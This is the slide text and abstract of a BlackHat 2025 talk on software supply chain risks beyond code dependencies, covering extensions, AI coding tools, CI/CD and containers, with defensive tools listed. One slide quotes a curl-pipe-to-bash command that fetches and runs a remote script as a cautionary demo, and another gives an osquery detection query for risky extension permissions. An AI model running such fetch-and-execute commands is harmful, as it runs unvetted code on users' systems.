Beyond Software Dependencies: The Real Picture of Software Supply Chain Security
A presentation at BlackHat USA 2025 in in Las Vegas, NV, USA by Anant Shrivastava
Beyond Software Dependencies The Real Picture of Software Supply Chain Security Anant Shrivastava
Anant Shrivastava ● Chief researcher @ Cyfinoid Research (Research Powered Trainings) ● 17+ yrs of corporate exposure ● Speaker / Trainer: BH/DC, c0c0n, nullcon, RootConf, RuxCon ● Project Lead: ● ○ Code Vigilant (Code Review Project) ○ Hacking Archives of India, ○ TamerPlatform (Android Security) (@anantshri on social platforms) https://anantshri.info © Cyfinoid Research 2
Question : Have you heard about SOFTWARE SUPPLY CHAIN SECURITY SBOM (SOFTWARE BILL OF MATERIAL) © Cyfinoid Research SOURCE COMPOSITION ANALYSIS TOOLS 3
Why? Incidences • SolarWind • CodeCov • Colonial Pipeline Resultant • EO by US President © Cyfinoid Research 4
Supply Chain issues are age old trust issues Ken Thompson talk about Supply Chain security and inherent trust in 1983. During the lecture, Ken outlines a three-step process for altering a C compiler binary to implant a backdoor when compiling the “login” program, all without leaving any evidence in the source code. He got the idea from an older US MIL document published in 1974 titled “MULTICS SECURITY EVALUATION” Ref● https://users.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf ● https://research.swtch.com/nih ● https://seclab.cs.ucdavis.edu/projects/history/papers/karg74.pdf © Cyfinoid Research 5
…and it’s not going anywhere anytime soon… In a report by European Union Agency for Cyber Security (ENISA), they state Supply Chain Compromise of Software Dependencies as one of the threats that gonna be at peak. Ref https://www.enisa.europa.eu/publicati ons/enisa-foresight-cybersecuritythreats-for-2030 © Cyfinoid Research 6
Effect across the globe in Govt Japan US EU India UK https://ec.europa.eu/commission/presscorner/detail/en/ip_22_5374 https://www.japantimes.co.jp/news/2022/05/11/business/japan-passes-economic-security-bill-protect-sensitive-technology/ https://www.federalregister.gov/d/2021-10460/p-54 https://www.cert-in.org.in/PDF/SBOM_Guidelines.pdf © Cyfinoid Research 7
Why now? • Software build automation == quicker release cycle • Automated release cycle == less wait for features • Faster feature release == less inclination to upgrade dependencies • Too much focus on OSS Codebase without helping the maintainers • Impossible segregation of features and bug fixes • Automated notification of vulnerability (hedonic hamster wheel) © Cyfinoid Research 8
Work done by Dependabot in last ~5 months Start of Feb 2025 End of June 2025 2451693 issues closed 120751 new issues created © Cyfinoid Research 9
What is Software Bill of Material Itemized list of all the ingredients in the software Ingredients ~ thirdparty components SBoM’s are mostly for one level depth only with other levels plugged in each other. https://www.ntia.gov/report/2021/minimum-elements-software-bill-materials-sbom © Cyfinoid Research 10
SCA Source Composition Analysis Tools Generate or Consume SBoM Identify Outdated Software Insecure Software EOL Product © Cyfinoid Research And more 11
Question : Raise your hands if You have SCA tooling in your organization? You follow vulnerability management practices for source code components? © Cyfinoid Research 12
Let the fun begin © Cyfinoid Research 13
Software Supply Chains beyond Code chain • We have focused too much on Software code itself • As consumers we are dealing with too many chain not in awareness • As a Company there are dependency chains far beyond code dependencies © Cyfinoid Research 14
What other chains? Any Software or application which allows 3rd party to add or modify functionality pluggable modules / plugins Extensions © Cyfinoid Research Theming customizations 15
A set of chain that existed 5 months back A developer uses a Chrome extension to manipulate AI prompts, which are then fed into Visual Studio Code through a set of AIdriven code completion extensions. The resulting code is committed to GitHub, where a set of GitHub Actions automatically run analysis and tests. The code is then containerized into a Docker image, deployed on Kubernetes, running inside an EC2 instance, built from a specific AMI. © Cyfinoid Research 16
A Chain that exists currently A developer uses an autonomous AI agent to write code by providing them a one liner prompt and full access to the commandline. The resulting code is committed to GitHub, where a set of GitHub Actions automatically run analysis and tests. The code is then containerized into a Docker image, deployed on Kubernetes, running inside an EC2 instance, built from a specific AMI. © Cyfinoid Research 17
Simplified Supply Chain view © Cyfinoid Research 18
Why do they matter PRODUCTION IS HARDENED, DEV NOT SO MUCH EASIER TO COMPROMISE LESS GUARDED PATHS © Cyfinoid Research SMALLER ORGS EASIER TO INFILTRATE / OCCUPY / ACQUIRE 19
Developer Machine : Why lucrative Lots of credentials and access Developers require a bit of lax security to get job done Exceptions in network policy rules Mostly will have admin access Multiple powerful apps (IDE, debugger etc) © Cyfinoid Research 20
Show me data don’t just imagine © Cyfinoid Research 21
Case studies: WYS Is not WYG Content delivered differently to curl and browser : Don’t curl | sh https://jordaneldredge.com/blog/one-way-curl-pipe-shinstall-scripts-can-be-dangerous/ Don’t pipe to shell https://www.seancassidy.me/dont-pipe-to-yourshell.html curl https://anantshri.info/fun/legitimate.sh | bash © Cyfinoid Research 22
Chrome Browser • By Google (claimed as fastest) • Installer runs without admin privilege (you can cancel admin prompts) • https://arstechnica.com/security/2025/01/dozens-ofbackdoored-chrome-extensions-discovered-on-2-6-milliondevices/ © Cyfinoid Research 23
What can a browser extension do © Cyfinoid Research 24
Cookie Monster • https://gbhackers.com/malicious-editthiscookie-extension/ © Cyfinoid Research 25
Visual Studio Code • Too many examples to count • https://www.bleepingcomputer.com/news/security/maliciousvscode-extensions-with-millions-of-installs-discovered/ © Cyfinoid Research 26
Visual Studio Marketplaces • VS Code extensions marketplace is only usable by MS Products • https://open-vsx.org “Extensions for VS Code Compatible Editors” • Just over 8 million developers depend on Open VSX across dozens of VS Code based editors including Cursor, Windsurf, Google Cloud Shell Editor, and Gitlab Web IDE • Exploiting a CI issue a malicious actor could publish malicious updates to every extension on Open VSX • Ref: https://blog.koi.security/marketplace-takeover-how-we-couldvetaken-over-every-developer-using-a-vscode-fork-f0f8cf104d44 © Cyfinoid Research 27
Homebrew • Google ads to bring traffic • Near replica of website • Serving install.sh with fake admin password prompt https://x.com/ryanchenkie/status/1880730173634699393 © Cyfinoid Research 28
Unexpected places for code execution https://manpages.debian.org/bookworm/apt/sources.list.5.en.html https://www.golinuxhub.com/2018/05/how-to-execute-script-at-pre-post-preun-postun-spec-file-rpm/ © Cyfinoid Research 29
Unexpected places for code execution © Cyfinoid Research 30
Notepad++ https://cybersecuritynews.com/hackers-hijacked-notepad-plugin/ © Cyfinoid Research 31
Notepad ++ Impersonation • https://notepad-plus-plus.org/news/help-to-take-down-parasite-site/ © Cyfinoid Research 32
Cursor oh Cursor © Cyfinoid Research 33
Rulefiles • Remember those CTF’s where flag was hidden in whitespaces • Just that but dangerous https://www.pillar.security/blog/new-vulnerability-in-github-copilot-and-cursor-how-hackers-canweaponize-code-agents © Cyfinoid Research 34
C.I. / C.D. Systems • Not just automation • Watch over the entire build or deployment practices • Essential Watchers in the current landscape © Cyfinoid Research 35
https://media.defense.gov/2023/Jun/28/2003249466/-1/-1/0/CSI_DEFENDING_CI_CD_ENVIRONMENTS.PDF © Cyfinoid Research 36
https://www.darkreading.com/vulnerabilities-threats/global-teamcity-exploitation-opens-door-to-solarwinds-style-nightmare © Cyfinoid Research 37
Container Images • Don’t install software • Download containers • Docker (ish) options needed https://www.infosecurity-magazine.com/news/malicious-containers-found-docker/ https://blog.aquasec.com/supply-chain-threats-using-container-images © Cyfinoid Research 38
Bait and Switch Package created with a good intent but later abused Wordpress free plugin purchased and backdoored • https://www.bleepingcomputer.com/news/security/backdoorfound-in-wordpress-plugin-with-more-than-300-000installations/ © Cyfinoid Research 40
Rogue Maintainers peacenotwar module sabotages npm developers in the node-ipc package to protest the invasion of Ukraine Overwrite all files with ❤ if origin is Russia or Belarus. Malware Civil War - 25 malicious packages in npm, with some posing as “colors.js,” and even an instance of malware authors targeting each other through a package called “lemaaa” designed to manipulate Discord accounts. Open source developer corrupts widely-used libraries, aWecting tons of projects - For packages color.js and faker.js, the maintainer pushed a corrupt update that triggers an infinite loop of weird characters. © Cyfinoid Research 41
So, what’s the plan? • A - Awareness: Identify and move unknown risks into known risks. • T - Trust But Verify: Every dependency, tool, and service should be validated. • O - Ongoing Monitoring: Continuous security checks to detect changes & anomalies. • M - Measure & Map: Build capabilities to answer real questions (e.g., how many machines have Chrome installed? How many plugins exist in GitHub workflows?). © Cyfinoid Research 42
Next Steps No matter how hard I try I will not be able to cover the full breadth © Cyfinoid Research 43
OpenSource Tool : SBoMPlay Demo Live: https://cyfinoid.github.io/sbomplay/ • SBoM Visualization tool • Privacy aware, client side only • No backend or server required GitHub Repository: https://github.com/cyfinoid/sbomplay Blog: https://cyfinoid.com/introducing-sbom-play-a-privacy-first-sbomexplorer-with-vulnerability-license-insights/ © Cyfinoid Research 44
Chrome Extension Auditing https://www.extensionauditor.com/ © Cyfinoid Research 45
End Point Visibility https://www.osquery.io/ SELECT * FROM chrome_extensions WHERE chrome_extensions.uid IN (SELECT uid FROM users) AND (permissions LIKE (‘%clipboardWrite%’) OR permissions LIKE (‘%<all_urls>%’) OR permissions LIKE (‘%tabs%’) OR permissions LIKE (‘%cookies%’) OR permissions like (‘%://*/%’)) Ref: https://medium.com/quiq-blog/detecting-high-risk-chrome-extensions-with-osquerybca1a8856448 © Cyfinoid Research 46
GitHub and Github Actions Basic Common Sense ● Signed Commit ● Protected Branches ● Force reviews for pull request approval ● Force signed commits © Cyfinoid Research 47
GitHub and Github Actions Tooling ● https://github.com/Legit-Labs/legitify ● https://best.openssf.org/SCM-BestPractices/ ● Implement allstar to enforce secure baselines in the organization. ● https://docs.zizmor.sh © Cyfinoid Research 48
Consumer : Vetting Process needed (Vet) https://docs.safedep.io/ © Cyfinoid Research 49
Consumer : Vetting Process Needed (Overlay) Overlay is a browser extension that helps developers evaluate open source packages before picking them. It gathers data from various sources, such as Snyk Advisor, Debricked, Socket.dev, and Deps.dev, and displays them on the package pages of popular registries like npm, PyPI, and Go. Install - https://github.com/osscar/overlay#installation Ref - h!ps://checkmarx.com/blog/software-supply-chain-security-leaders-collaborate-and-build-browser-extension-to-help-developers-choose-open-source/ © Cyfinoid Research 50
Cloud Auditing • ScoutSuite: https://github.com/nccgroup/ScoutSuite • Prowlet: https://github.com/prowler-cloud/prowler • Kube-hunter: https://github.com/aquasecurity/kube-hunter • Kube-bench: https://github.com/aquasecurity/kube-bench • KubiScan: https://github.com/cyberark/KubiScan • Kubeaudit: https://github.com/Shopify/kubeaudit • Trivy: https://github.com/aquasecurity/trivy • Cosign: Provenance : https://github.com/sigstore/cosign © Cyfinoid Research 51
Broad Visualization of Software Supply Chain https://github.com/SecureStackCo/visualizing-software-supply-chain?tab=readme-ov-file © Cyfinoid Research 52
Supply-chain Levels for Software Artifacts https://slsa.dev/ © Cyfinoid Research 53
OWASP SCVS ~ SSDF • https://scvs.owasp.org/ • https://csrc.nist.gov/Projects/ssdf © Cyfinoid Research 54
Open Software Supply Chain Attack Reference https://pbom.dev/ © Cyfinoid Research 55
OpenSource Tool : 3PTracer Demo Live: https://cyfinoid.github.io/3ptracer/ • 3rd party connection discovery via DNS • Privacy aware, client side only • No backend or server required GitHub Repository: https://github.com/cyfinoid/3ptracer Blog: https://cyfinoid.com/introducing-3p%e2%80%91tracerthird%e2%80%91party-mapping-in-your-browser/ © Cyfinoid Research 56
Can of worms that I have not touched © Cyfinoid Research 57
A scarier chain of events: Shadow IT World Your Biz Dev / HR / Finance person gets an idea, downloads cursor/windsurf/AI IDE, pays for 1 month of subscription by personal card. Uses the IDE to develop the application. Does deployment per AI recommendation in personal vercel / railway or likes. Either get admin to CNAME to a url or just make a url available as direct url in documentation. © Cyfinoid Research 58
References • https://openssf.org/technical-initiatives/software-supply-chain • https://www.cisa.gov/sbom • https://cyclonedx.org © Cyfinoid Research 59
Thanks for listening & open to Questions? NAME WEBSITE anant@cyfinoid.com EMAIL © Cyfinoid Research 60
Software Supply Chain Security has been a buzzword for the past few years, but as the initial hype settles, it’s time to ask: what’s actually working—and what’s being overlooked?
In response to rising threats, many organizations have rushed to implement SCA tools or generate SBOMs and called it a day. But security is rarely that simple. Is generating a BOM of your code dependencies truly enough? What about the unsigned binaries your devs download during prototyping, the Docker images pulled from random GitHub issues, or the low-friction APIs that newer technologies—like AI platforms—introduce into trusted environments?
This talk takes a 360-degree view of supply chain security—beyond just dependencies—to highlight the broader risks involved in how modern software is developed, integrated, deployed, and consumed. We’ll explore:
The lay of the land: current initiatives from open source foundations, government bodies, and industry players, and how individuals and organizations can contribute or align with them.
A clear definition of supply chain security—what it is and isn’t—so we stop chasing shadows and start solving real risks.
Why SBOMs are a valuable tool, but not a silver bullet. We’ll discuss where they shine, where they struggle, and what remains unaccounted for even with perfect SBOMs.
Case studies and real-world incidents illustrating how rapid tech adoption often outpaces secure design, leaving behind misconfigurations and attack surfaces across the software lifecycle.
Whether you’re building software or just using it, this session will challenge assumptions, offer practical mental models, and leave you with a grounded understanding of where your supply chain security posture actually stands—and where the gaps may lie.
